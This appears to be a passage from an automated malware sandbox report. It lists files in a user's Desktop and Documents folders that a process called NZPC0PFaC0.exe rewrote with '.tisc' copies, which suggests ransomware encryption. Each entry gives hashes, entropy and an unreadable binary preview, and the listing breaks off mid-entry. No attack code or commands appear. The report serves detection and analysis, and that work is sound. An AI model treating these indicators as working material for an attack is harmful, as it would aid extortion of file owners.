                                                                                    Preview: .......5@j..".#..b-y6.9u..."9..,.I...7...K.-.i_+fD.....O-..x........D.i.......b.5...k...x5._...z...K.i./.LC9.v.N..oe._...>%.&A.x.s>........N.M..v....<O..A.....9....\Kd..k.I&....&M..2'..h..........>.^9.Z../o4..*....mi.....].b...k..6..Ei.5Q...n...J.M..{.;.*..1.b..P.L.t~|..f...K$.O.....T.A+.Mm.\.L#.........g.G.A.....q..!....nc9H..~.d...../...^.........1..c._..f.M..l.1.<.>f.O...:T6z..f.|'De.....P.zm..V#.....&..F *.!...G....=....jE...O..BF.u.._6h9L..9.<`*wozP........:[....q3..gp........w.R..8.,..=.&8..U.O.ho.#:.....%+..q..c;......;z!...L1....X(>n.0.e....l....g...(...{.]Q.&...9...86..-.m.:..3;.[.'....}..L..Jh.`.7......g...,...>..n..Hc^8...S"$..f.&1fgf ...7.<t..@..o.*.;6.B`...v....=.v..#g&.`J\1......R.ks.+K..g.......*.,.x..V\x..P..A...L.S........".?W*~.|.....RK........C.k.....-..F...M.N_.......R-......y....A)...P. o.=N.W|mb..2.. S..T.s.....`...K.(....N(..wD..b.bZ.8.5.d.Q6..._..7j.$......f.C..W..]..O.....E.x.......F.:.. ..W.y..-....
                                                                                    C:\Users\user\Desktop\QNCYCDFIJJ\PWCCAWLGRE.pdf
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.870708000949349
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:EpxmHaX6syxo9R/jmMzbf0h0PlXTcqwIzJasEoubfvq4fe6vG9tTebhMCC1P89+p:EDkaIo9hj31lXQqwiJUoyW6+AMCClk+p
                                                                                    MD5:61E200E080D1E1E9DBF7FD1CB5213E38
                                                                                    SHA1:EEC85EA5C229E29AB3FA9692DF6698CF876F334A
                                                                                    SHA-256:0EA214225274B8AD26B755DF9C35127EFBD631F4CC357D8432B9A8CF98914474
                                                                                    SHA-512:F4A03B71CCBDF4E4B3D3361B3EC6353B88CF63DB2913887B74F4AF66FEB4F3512FE18FBC1D02D71CCCE3E84E3E6A22BBE75DE015C379D5F878DAB1D8FA560CE7
                                                                                    Malicious:true
                                                                                    Reputation:unknown
                                                                                    Preview: 7.....;.%......P\....o.Yo8....>.i....&#..R....s~F..-.........^.{.n..g`W...N.n.....%V(7..{. .@...3;..!..EMS4Pd.O$.Z...j...N...1.|.\.C?..?..:.j.........../.P...9C.%\.>b!F..S..`*.....-..T.@#.t............&..[i._<....X.....5}......S..<R......}......e....L.".....V....{.7.h......#..+.E.J].E.&...(..S.....#?u....^L>.A....+f..3....^+C.RJ`. .5L....\S.[..(...?B.*.7.w.Y.t.,~..<p.So:..Y... i.K..q....&.a3...=.M...q.........C/FR.0J...H.R..{......O...*.....*.wPm..t..M.G.B.*......0e...."..By.\O/I......T,....C....a..|9.IA._\.>....ym.....o..2.@l7.5J.E1G...|%...e,.u..?..3.RR.2i.....Lw.[/S%.+:6.g...k.|QW.....v!..'.JC..&A.s..L..yv......P.z.~O.4G.Z..........z.U....|...j.....9."b....w:MH.Pw8[c.p.:.F.@.Gq.J.oIry...6..nb.....T.....7(.1..}..k....rgP.g.2...#K..$..-........Z...Xd....>G..2.qLe..., (..:.>FtnC...js...@+....z....:P...*u...7.@..CX..c2../.^.Ce.....{.^..y.=......M~.....'....c.}P.-.{a.t..c..........&jJ\$...6..4..3...y{...,O...)aS...8.....-O
                                                                                    C:\Users\user\Desktop\QNCYCDFIJJ\PWCCAWLGRE.pdf.tisc (copy)
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.870708000949349
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:EpxmHaX6syxo9R/jmMzbf0h0PlXTcqwIzJasEoubfvq4fe6vG9tTebhMCC1P89+p:EDkaIo9hj31lXQqwiJUoyW6+AMCClk+p
                                                                                    MD5:61E200E080D1E1E9DBF7FD1CB5213E38
                                                                                    SHA1:EEC85EA5C229E29AB3FA9692DF6698CF876F334A
                                                                                    SHA-256:0EA214225274B8AD26B755DF9C35127EFBD631F4CC357D8432B9A8CF98914474
                                                                                    SHA-512:F4A03B71CCBDF4E4B3D3361B3EC6353B88CF63DB2913887B74F4AF66FEB4F3512FE18FBC1D02D71CCCE3E84E3E6A22BBE75DE015C379D5F878DAB1D8FA560CE7
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: 7.....;.%......P\....o.Yo8....>.i....&#..R....s~F..-.........^.{.n..g`W...N.n.....%V(7..{. .@...3;..!..EMS4Pd.O$.Z...j...N...1.|.\.C?..?..:.j.........../.P...9C.%\.>b!F..S..`*.....-..T.@#.t............&..[i._<....X.....5}......S..<R......}......e....L.".....V....{.7.h......#..+.E.J].E.&...(..S.....#?u....^L>.A....+f..3....^+C.RJ`. .5L....\S.[..(...?B.*.7.w.Y.t.,~..<p.So:..Y... i.K..q....&.a3...=.M...q.........C/FR.0J...H.R..{......O...*.....*.wPm..t..M.G.B.*......0e...."..By.\O/I......T,....C....a..|9.IA._\.>....ym.....o..2.@l7.5J.E1G...|%...e,.u..?..3.RR.2i.....Lw.[/S%.+:6.g...k.|QW.....v!..'.JC..&A.s..L..yv......P.z.~O.4G.Z..........z.U....|...j.....9."b....w:MH.Pw8[c.p.:.F.@.Gq.J.oIry...6..nb.....T.....7(.1..}..k....rgP.g.2...#K..$..-........Z...Xd....>G..2.qLe..., (..:.>FtnC...js...@+....z....:P...*u...7.@..CX..c2../.^.Ce.....{.^..y.=......M~.....'....c.}P.-.{a.t..c..........&jJ\$...6..4..3...y{...,O...)aS...8.....-O
                                                                                    C:\Users\user\Desktop\QNCYCDFIJJ\QCFWYSKMHA.xlsx
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.855603537246963
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:HYDVabV4JxVtn9k2X/vAgRQxBTo8FMwjHEdlc0hf1cb69jGv1UFOvRdFut2gbD:44bVKVR9DXgnxBTo8Oqilc0hdh9CSFOG
                                                                                    MD5:1FA3EEEB9F2F7333E6BD9455704A98D1
                                                                                    SHA1:C107AD4C02F3674EA176BDE8DCA75BD8DDAA1931
                                                                                    SHA-256:5A8124527F1C93820A72B3666C2418867D78456D3776B890B6E50F016A5FB3EF
                                                                                    SHA-512:BACEE8B76BD080B45A06331944240589234F37A8FEE2D445512F42A8BD192368777D0CF50BFA9B3F908BB08D0CA1C2082EE24E4BF79B68A97953B5B809E44551
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: 6..ZC.. .v....+:......m......"n.0..fV......B...R..`.r......}^q.U.'[.u...a..#e..r.>...d...j.a@.........K<....{... ZF....u5\iH......m)....Q...mf..0.n....?Y..K'.UH..!.CU.&..T..9[c.$..z..H.......7..r..Ny........3...x.i.8h..h_....x.W......$X..mD.H.jrl....&Y.0.5.w[...o.E..f.c.Y.../.Rj....6..S.rj..(...4.8&.E.}d....J.*.2..VO......4kb|3.=7.LQr|%......a.../...g([.......eC......w....p`.o.gC..%....;....X.\3..H..n.g.pt.L.O4..?"..[.K .x.,B|....t<..C..!..F.2..._w....R.m..j.$.F.._.4....h>%.!..$f.8cYL......0........n.2p\.n.B.....f.l.O.Z+.[.X...^.J..8.....g../....l..d...{.h...0".87b.v.!....k.G.....e\..#R.I..Xf_./..x....{..z..AR..V.....c..q6..h...h...Z}..l....w..... ...&...~......?.#..&.k>.a`.S)\5..s..D..]W..SS.8>.0.........+h....-..v/...bt.M.x.......Q..K...X.L/...=.ETR.:N.E.?..tP'.....W..T\B....Z.......kj'..vF...3t)Q..W..<..+e....N..K."k9b`....._-.[?..O..f.Uv.....g.%..T7...X.......E.+...[=7..[.......a..3.k.k;W(.....Oc8x G.....3',.Z*..>...S.7...K..
                                                                                    C:\Users\user\Desktop\QNCYCDFIJJ\QCFWYSKMHA.xlsx.tisc (copy)
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.855603537246963
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:HYDVabV4JxVtn9k2X/vAgRQxBTo8FMwjHEdlc0hf1cb69jGv1UFOvRdFut2gbD:44bVKVR9DXgnxBTo8Oqilc0hdh9CSFOG
                                                                                    MD5:1FA3EEEB9F2F7333E6BD9455704A98D1
                                                                                    SHA1:C107AD4C02F3674EA176BDE8DCA75BD8DDAA1931
                                                                                    SHA-256:5A8124527F1C93820A72B3666C2418867D78456D3776B890B6E50F016A5FB3EF
                                                                                    SHA-512:BACEE8B76BD080B45A06331944240589234F37A8FEE2D445512F42A8BD192368777D0CF50BFA9B3F908BB08D0CA1C2082EE24E4BF79B68A97953B5B809E44551
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: 6..ZC.. .v....+:......m......"n.0..fV......B...R..`.r......}^q.U.'[.u...a..#e..r.>...d...j.a@.........K<....{... ZF....u5\iH......m)....Q...mf..0.n....?Y..K'.UH..!.CU.&..T..9[c.$..z..H.......7..r..Ny........3...x.i.8h..h_....x.W......$X..mD.H.jrl....&Y.0.5.w[...o.E..f.c.Y.../.Rj....6..S.rj..(...4.8&.E.}d....J.*.2..VO......4kb|3.=7.LQr|%......a.../...g([.......eC......w....p`.o.gC..%....;....X.\3..H..n.g.pt.L.O4..?"..[.K .x.,B|....t<..C..!..F.2..._w....R.m..j.$.F.._.4....h>%.!..$f.8cYL......0........n.2p\.n.B.....f.l.O.Z+.[.X...^.J..8.....g../....l..d...{.h...0".87b.v.!....k.G.....e\..#R.I..Xf_./..x....{..z..AR..V.....c..q6..h...h...Z}..l....w..... ...&...~......?.#..&.k>.a`.S)\5..s..D..]W..SS.8>.0.........+h....-..v/...bt.M.x.......Q..K...X.L/...=.ETR.:N.E.?..tP'.....W..T\B....Z.......kj'..vF...3t)Q..W..<..+e....N..K."k9b`....._-.[?..O..f.Uv.....g.%..T7...X.......E.+...[=7..[.......a..3.k.k;W(.....Oc8x G.....3',.Z*..>...S.7...K..
                                                                                    C:\Users\user\Desktop\QNCYCDFIJJ\QNCYCDFIJJ.docx
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.844310667032083
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:nQ71FykNJP50Gp7wjLRTsXIF1F7XkhfzoUp+XhoEgTnJaze87GxmC8wTX13e3gbD:nG0kPh0GRwQIF1lX4pzEglV8yxmRw7gi
                                                                                    MD5:5C4C7EA1ECBA8CA68EEF26BF522797D9
                                                                                    SHA1:1571652C64FC40C2D6E0B5745663BFDB4BA34AAC
                                                                                    SHA-256:7BF3EF6A1A6558C38B0D94EF6CA09522F39D1279E2F65AA4078CBC28D140A977
                                                                                    SHA-512:6E9E0ACD8935CAA301EB6B76B41B0035CCD3F41F6BE920031C8BEDA8391052683BDEB3C0AC42D680E8CC933DB99C772DDE482368EDEC66031CE20891CE29FA60
                                                                                    Malicious:true
                                                                                    Reputation:unknown
                                                                                    Preview: ..D.......<:.......o).).< ..A..N.^E.#.X.....ta....-|.{&Q[..]s.8.]......d...B;[G_.-....e..2...[_6...@....7[.5...J.4..V.....X... .fA.l ....f...'S.mO:..b.).zjV]4H.$w.......E.$..c.|.(=.*;.....,.7......._..{&. ..f9.t.veS.......%._.o.? ?.m....'a+..%q.;'.9.9...z.E.2/........V(...c'..|@...*.j....../..........q...z6j...(g.............2...i}a..$....>..}L7.7.a....#..;t.d6B.=.9..k.Z..|...*....L.P^.~bx....-I.;p...(.a....3 O.s..r.........XT.;...<'bm...2....3..eH..gERD...p..W.q...aTf...aNg+..../.........k...!..\..~C.klf.@\..).....\l....J.....x.'.D....g.~...S#.u.k.m2}8H...8hWQ............E......N.`..y...%.g....W...8..)uQ......auI.H.u;h...Gn;....s.d/..I..[x..2.......I...-.:X....Q.....*...9.t.CO....I.........a..05.4.W3D..q..h...c.=..^....=...=.D7+..:.n.....x.x~...L.q.]..V/3...UR)...dv..b.Q.>.Q..o..#...%.)...."GO..E~`..f....!LkY.@/....Q.p.&0.J...Y..s.c..9P...}..~^.........N[..Q>.a.....F.......r.....?..CE..`{R..9.@.HY..........0...........]...e
                                                                                    C:\Users\user\Desktop\QNCYCDFIJJ\QNCYCDFIJJ.docx.tisc (copy)
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.844310667032083
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:nQ71FykNJP50Gp7wjLRTsXIF1F7XkhfzoUp+XhoEgTnJaze87GxmC8wTX13e3gbD:nG0kPh0GRwQIF1lX4pzEglV8yxmRw7gi
                                                                                    MD5:5C4C7EA1ECBA8CA68EEF26BF522797D9
                                                                                    SHA1:1571652C64FC40C2D6E0B5745663BFDB4BA34AAC
                                                                                    SHA-256:7BF3EF6A1A6558C38B0D94EF6CA09522F39D1279E2F65AA4078CBC28D140A977
                                                                                    SHA-512:6E9E0ACD8935CAA301EB6B76B41B0035CCD3F41F6BE920031C8BEDA8391052683BDEB3C0AC42D680E8CC933DB99C772DDE482368EDEC66031CE20891CE29FA60
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: ..D.......<:.......o).).< ..A..N.^E.#.X.....ta....-|.{&Q[..]s.8.]......d...B;[G_.-....e..2...[_6...@....7[.5...J.4..V.....X... .fA.l ....f...'S.mO:..b.).zjV]4H.$w.......E.$..c.|.(=.*;.....,.7......._..{&. ..f9.t.veS.......%._.o.? ?.m....'a+..%q.;'.9.9...z.E.2/........V(...c'..|@...*.j....../..........q...z6j...(g.............2...i}a..$....>..}L7.7.a....#..;t.d6B.=.9..k.Z..|...*....L.P^.~bx....-I.;p...(.a....3 O.s..r.........XT.;...<'bm...2....3..eH..gERD...p..W.q...aTf...aNg+..../.........k...!..\..~C.klf.@\..).....\l....J.....x.'.D....g.~...S#.u.k.m2}8H...8hWQ............E......N.`..y...%.g....W...8..)uQ......auI.H.u;h...Gn;....s.d/..I..[x..2.......I...-.:X....Q.....*...9.t.CO....I.........a..05.4.W3D..q..h...c.=..^....=...=.D7+..:.n.....x.x~...L.q.]..V/3...UR)...dv..b.Q.>.Q..o..#...%.)...."GO..E~`..f....!LkY.@/....Q.p.&0.J...Y..s.c..9P...}..~^.........N[..Q>.a.....F.......r.....?..CE..`{R..9.@.HY..........0...........]...e
                                                                                    C:\Users\user\Desktop\QNCYCDFIJJ\SUAVTZKNFL.jpg
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.838174766100615
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:AHnNunt3t6mMMNCV3M+g925TYcW3YezjIWwK2XN9HkpocHw/+qoIFTRgbD:YQcMNCV3I902o+jD/2/HzHmyFUD
                                                                                    MD5:EB3200010AFEDC51CC5D3721B613B616
                                                                                    SHA1:635CCC4ADC72EE214E0C30C917409728884C780E
                                                                                    SHA-256:5AAB21AA004E4D1A0061F20AF4A002AB15F46B0C998EFDA51C8843847F9E2320
                                                                                    SHA-512:EB5CB673D7F6BBB0822C129BD9A22B524A2C54D5B1F9A9966B4D4D81644140C4441B93EA9894734B568B68ADFA2E9705AE9B86CB3C3E7AC815A601280F1AEFF7
                                                                                    Malicious:true
                                                                                    Reputation:unknown
                                                                                    Preview: ;..0.;.'E..2.ki#...`..Al.2..x.Z.......2w..1..uYD....4e..F.#l..:...{L.k....2.x.....%L.5...T...@C.......B..Z)x...q..#..O....;dot...../.w..I./Ul.PM.H#..H..A.N......./.....nI.9.f....q~.tbH.......7.7.I..9|...M.*<;...E,,9...f;=.+.y..I.h....v.{...i.~>..?.X.D..)...J.9.OB;R..(.........nH%J/..*.J..V..Q.6i.Tw..q..3..-T.....x.............r....V.._.v.z.nJ...+B~G..Im.'._K...t.e.k.d}-w$.(......B.....?..EIv...-..W{..}......$J.^q[.......$G^.$.....&.G....J..Lp....0....iA'C...5&.L.'..a..Wb.!.9....L.7".B...._S..I ...TJlx..:u..6..%.6..w...#.s.H4]...<....5z...b....[....zQ.[._..!Y....Z.:z.J..p...%.<]......b:.i.]BL...S.8yn..-...n.E.q...1...`..6.....=....B>..s.R.s.1...F.wr..V.......c.N4<...ElK".4W..N:n..,...<wY.....83.....a{.3c9v..+..O1.t.7]@.1R...z.5..Mtr7t9...*....am.F......e?p...6i...X.k..C:)....S&_ud...`m..RU.s..z..[@.K...X.;Q..0G4.O. ..5.o..b.,.)ndh..#..[..a..j5n[..a..z.......^.3tN!......o...[~JUX...8xD .....s^g1....<l...;Qu..VP.k.nC...G..N....D.......'.iNZk.R0
                                                                                    C:\Users\user\Desktop\QNCYCDFIJJ\SUAVTZKNFL.jpg.tisc (copy)
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.838174766100615
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:AHnNunt3t6mMMNCV3M+g925TYcW3YezjIWwK2XN9HkpocHw/+qoIFTRgbD:YQcMNCV3I902o+jD/2/HzHmyFUD
                                                                                    MD5:EB3200010AFEDC51CC5D3721B613B616
                                                                                    SHA1:635CCC4ADC72EE214E0C30C917409728884C780E
                                                                                    SHA-256:5AAB21AA004E4D1A0061F20AF4A002AB15F46B0C998EFDA51C8843847F9E2320
                                                                                    SHA-512:EB5CB673D7F6BBB0822C129BD9A22B524A2C54D5B1F9A9966B4D4D81644140C4441B93EA9894734B568B68ADFA2E9705AE9B86CB3C3E7AC815A601280F1AEFF7
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: ;..0.;.'E..2.ki#...`..Al.2..x.Z.......2w..1..uYD....4e..F.#l..:...{L.k....2.x.....%L.5...T...@C.......B..Z)x...q..#..O....;dot...../.w..I./Ul.PM.H#..H..A.N......./.....nI.9.f....q~.tbH.......7.7.I..9|...M.*<;...E,,9...f;=.+.y..I.h....v.{...i.~>..?.X.D..)...J.9.OB;R..(.........nH%J/..*.J..V..Q.6i.Tw..q..3..-T.....x.............r....V.._.v.z.nJ...+B~G..Im.'._K...t.e.k.d}-w$.(......B.....?..EIv...-..W{..}......$J.^q[.......$G^.$.....&.G....J..Lp....0....iA'C...5&.L.'..a..Wb.!.9....L.7".B...._S..I ...TJlx..:u..6..%.6..w...#.s.H4]...<....5z...b....[....zQ.[._..!Y....Z.:z.J..p...%.<]......b:.i.]BL...S.8yn..-...n.E.q...1...`..6.....=....B>..s.R.s.1...F.wr..V.......c.N4<...ElK".4W..N:n..,...<wY.....83.....a{.3c9v..+..O1.t.7]@.1R...z.5..Mtr7t9...*....am.F......e?p...6i...X.k..C:)....S&_ud...`m..RU.s..z..[@.K...X.;Q..0G4.O. ..5.o..b.,.)ndh..#..[..a..j5n[..a..z.......^.3tN!......o...[~JUX...8xD .....s^g1....<l...;Qu..VP.k.nC...G..N....D.......'.iNZk.R0
                                                                                    C:\Users\user\Desktop\SUAVTZKNFL.jpg
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.846794542862296
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:zQDDXgg3xLDz4R/NvbovYdqvzyoU1T+ogDeIEVT9b0RiSWlEGgbD:zQDDHL/sNogd2uoXogDaV2zCEjD
                                                                                    MD5:ADE30438D679E2C2466BBDF8171E19FA
                                                                                    SHA1:DFA4869A881637BC5BF8260C10869597F7442907
                                                                                    SHA-256:45AA9756CFB286CE992BF754E51EE4147059DF0FA7DD26A6C922910D95EF4681
                                                                                    SHA-512:EF3B0F60E6715AAD18D876114A69975DCD194E14443A2E0E8BA0073775407F34A7ACCD319E244930A134995BE1BACCBD19C7E77C1346DD5ACEAC7EE8428C5595
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: ......p...:o+i.k`....i.........&...dRzd...xf....b.~GG............e.p....Q...f...?..WO..6(.?o.C...0q]o;..q...KL.S..V@.....SL.............n...j...~..i..C.P.p<.S.@....."}..@....R3.M.G...^...p..3X....Vj.)......O.>.....D.....a....4.;.V.Qj..,.i.........Z......{..E..e.m7.....z....m.._.3..m4\.y...6y......s....H..hq.d5k:....A.~.V.....x6.$.<.L.W.'.B.G.+.d[rl..[i8^s....9X......_........(....t...=..S3.#.....`.6.+....jf...........EQT.?....w..}...j..t...c.l...........F...4J.0.)U{..B.s).X..$X.A.a."....r..a>.}.Yt....b.'...7w.-...Z...x..xG<........@.;.....D-_..d.......>w._.~...+....z.4.|E..vT...........h.0,ZL.2.I_..$Zs..X$...^...A..M.V^C......g&..0.v2I.Y..y}Y..#.'..v-,.K..{..N."..}\...~.}+../aL.s....[.|.%`.l..X_.'..S...h...$p..^D..V.....ww.z...B...txK./Q.<...[.7.=...j1..a..-.J.h!......6......4A~<R..t...%.4.._..P"....16....s.....Q We.2. ..T....B]....kS.J;z..f.Z_.r3..h.O......)..[JFT..~.;.&.rO.bo..o........g....n...&Iks..Y..3..d..l...$@p&...@.?
                                                                                    C:\Users\user\Desktop\SUAVTZKNFL.jpg.tisc (copy)
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.846794542862296
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:zQDDXgg3xLDz4R/NvbovYdqvzyoU1T+ogDeIEVT9b0RiSWlEGgbD:zQDDHL/sNogd2uoXogDaV2zCEjD
                                                                                    MD5:ADE30438D679E2C2466BBDF8171E19FA
                                                                                    SHA1:DFA4869A881637BC5BF8260C10869597F7442907
                                                                                    SHA-256:45AA9756CFB286CE992BF754E51EE4147059DF0FA7DD26A6C922910D95EF4681
                                                                                    SHA-512:EF3B0F60E6715AAD18D876114A69975DCD194E14443A2E0E8BA0073775407F34A7ACCD319E244930A134995BE1BACCBD19C7E77C1346DD5ACEAC7EE8428C5595
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: ......p...:o+i.k`....i.........&...dRzd...xf....b.~GG............e.p....Q...f...?..WO..6(.?o.C...0q]o;..q...KL.S..V@.....SL.............n...j...~..i..C.P.p<.S.@....."}..@....R3.M.G...^...p..3X....Vj.)......O.>.....D.....a....4.;.V.Qj..,.i.........Z......{..E..e.m7.....z....m.._.3..m4\.y...6y......s....H..hq.d5k:....A.~.V.....x6.$.<.L.W.'.B.G.+.d[rl..[i8^s....9X......_........(....t...=..S3.#.....`.6.+....jf...........EQT.?....w..}...j..t...c.l...........F...4J.0.)U{..B.s).X..$X.A.a."....r..a>.}.Yt....b.'...7w.-...Z...x..xG<........@.;.....D-_..d.......>w._.~...+....z.4.|E..vT...........h.0,ZL.2.I_..$Zs..X$...^...A..M.V^C......g&..0.v2I.Y..y}Y..#.'..v-,.K..{..N."..}\...~.}+../aL.s....[.|.%`.l..X_.'..S...h...$p..^D..V.....ww.z...B...txK./Q.<...[.7.=...j1..a..-.J.h!......6......4A~<R..t...%.4.._..P"....16....s.....Q We.2. ..T....B]....kS.J;z..f.Z_.r3..h.O......)..[JFT..~.;.&.rO.bo..o........g....n...&Iks..Y..3..d..l...$@p&...@.?
                                                                                    C:\Users\user\Desktop\SUAVTZKNFL.xlsx
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.848785090996732
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:A34LmAFdgU2QBf1WlSjMeYchhIXB6QE1j9aAoH8BPxTAypkglgDZ8gbD:A3+mqgU2gf1r5TCAoH8BpTAyaglgHD
                                                                                    MD5:CD7A6793DA1E7A86547F6F8424EDB0A3
                                                                                    SHA1:6DC4C4537D0D03539EDBBABC7B573373A3B0C244
                                                                                    SHA-256:3AE4C9A62CA3EFE1C73AEC28ABED0393BFBADC49C5D39E5B391918B32ABD9712
                                                                                    SHA-512:B86262A62EE25574E7A20E5C81A06D4F631A30CE6BC07EE13E5F265A40927562C1C4C0B14381B95CDC6CAA3E26FFA285ECBC3CDE5FB7D5B3B12822936CB14CB8
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: ".....wV6X.J.Z..$.x..tQ..!$.@..l..X.^.~...........|..#...f.8......._....7z..mVJ...Z....vi~.-.....n..R.:.....jC.]hV....>....T"...clf.S...s.....dy\.Un......gf....=..V...G..I...rIr.s..-.>I.kc...-l ...:...1T.....C[G'....Yc..n57.....V.L:jX....:....W...*..s....;.];..d.`..w._.......-.....t.._........U....XD.X.....t<....i..TY..Se_...d.~....-.0...v......#.B.D..6.M.........).)[.....-..i...._{.......?g.X`..I.f.kd......?.)?.............@..=R.i:.w.+......)..$....]....)%{Oy+=...Q....'....\2..)'..)~.z...GtH.-....|..d.1...X.b....x..j9..wgD|....Y...P...n=.......A..B..O...U.dY.......~=3....]....(o. ^b...n.9...E^s.........}.i.y.T...xso......_/..s.T..{....?.4.j.....-.R[b...7.#.U.v.D...._..j.+....AI...n.2sq.%B.....8..!..x4..o..X.].u.+N.7...Ql.j.&.G=...e9.....f....V*>.3:].d.....1.....00..e...)bS.|...{..AL,e.V...Kt.J..)...2"....ht#.....S?..1..T.t..,g....x.{.\..Ri......D...g...=.>.......!....7E.........{%K.P..?..^.....S.=..3.............mX..C..1.5.
                                                                                    C:\Users\user\Desktop\SUAVTZKNFL.xlsx.tisc (copy)
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.848785090996732
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:A34LmAFdgU2QBf1WlSjMeYchhIXB6QE1j9aAoH8BPxTAypkglgDZ8gbD:A3+mqgU2gf1r5TCAoH8BpTAyaglgHD
                                                                                    MD5:CD7A6793DA1E7A86547F6F8424EDB0A3
                                                                                    SHA1:6DC4C4537D0D03539EDBBABC7B573373A3B0C244
                                                                                    SHA-256:3AE4C9A62CA3EFE1C73AEC28ABED0393BFBADC49C5D39E5B391918B32ABD9712
                                                                                    SHA-512:B86262A62EE25574E7A20E5C81A06D4F631A30CE6BC07EE13E5F265A40927562C1C4C0B14381B95CDC6CAA3E26FFA285ECBC3CDE5FB7D5B3B12822936CB14CB8
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: ".....wV6X.J.Z..$.x..tQ..!$.@..l..X.^.~...........|..#...f.8......._....7z..mVJ...Z....vi~.-.....n..R.:.....jC.]hV....>....T"...clf.S...s.....dy\.Un......gf....=..V...G..I...rIr.s..-.>I.kc...-l ...:...1T.....C[G'....Yc..n57.....V.L:jX....:....W...*..s....;.];..d.`..w._.......-.....t.._........U....XD.X.....t<....i..TY..Se_...d.~....-.0...v......#.B.D..6.M.........).)[.....-..i...._{.......?g.X`..I.f.kd......?.)?.............@..=R.i:.w.+......)..$....]....)%{Oy+=...Q....'....\2..)'..)~.z...GtH.-....|..d.1...X.b....x..j9..wgD|....Y...P...n=.......A..B..O...U.dY.......~=3....]....(o. ^b...n.9...E^s.........}.i.y.T...xso......_/..s.T..{....?.4.j.....-.R[b...7.#.U.v.D...._..j.+....AI...n.2sq.%B.....8..!..x4..o..X.].u.+N.7...Ql.j.&.G=...e9.....f....V*>.3:].d.....1.....00..e...)bS.|...{..AL,e.V...Kt.J..)...2"....ht#.....S?..1..T.t..,g....x.{.\..Ri......D...g...=.>.......!....7E.........{%K.P..?..^.....S.=..3.............mX..C..1.5.
                                                                                    C:\Users\user\Documents\BJZFPPWAPT.mp3
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.841662460483488
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:YW0NU4LtwtxOCmIIpyrFGDhBNhhw0dx1/UulRwZJsQwTMRis5ByNh+VQgbD:YRtxCmILMf5sulOJwT/wyNkD
                                                                                    MD5:48C8316ECC537622B8008C172CC00030
                                                                                    SHA1:3701EE5D874DE7C6333664BA9D4249D38FD0C38A
